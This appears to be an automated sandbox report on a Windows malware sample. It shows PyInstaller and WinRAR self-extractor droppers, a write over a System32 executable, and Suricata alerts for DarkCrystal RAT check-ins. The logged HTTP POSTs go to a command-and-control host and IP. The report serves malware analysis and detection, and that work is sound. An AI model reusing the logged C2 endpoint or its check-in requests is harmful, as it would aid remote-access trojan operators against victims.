                          Source: Binary string: C:\A\34\b\bin\amd64\python39.pdb source: t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: D:\a01\_work\26\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655768186.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                          Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: .pdbza, source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B2EF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Tue Apr 6 11:26:02 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.pdb source: Chaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: BoosterX.exe, 00000004.00000000.1662947336.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, BoosterX.exe, 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, Chaindriver.sfx.exe, 00000007.00000000.1672760470.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe, 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe.4.dr, BoosterX.exe.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb## source: _decimal.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr

                          Spreading

                          barindex
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED8D00 FindFirstFileExW,FindClose,0_2_00007FF652ED8D00
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF652EF26C4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C036407C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C037B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C037B110
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C038FC20 FindFirstFileExA,4_2_00007FF6C038FC20
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B5B110
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B4407C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6FC20 FindFirstFileExA,7_2_00007FF720B6FC20
                          Source: C:\Chaindriver.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49820 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49788 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49841 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49859 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49809 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49995 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50013 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50014 -> 185.158.202.52:80
                          Source: Joe Sandbox ViewASN Name: PREVIDER-ASNL PREVIDER-ASNL
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: 797441cm.n9shteam2.top
                          Source: unknownHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
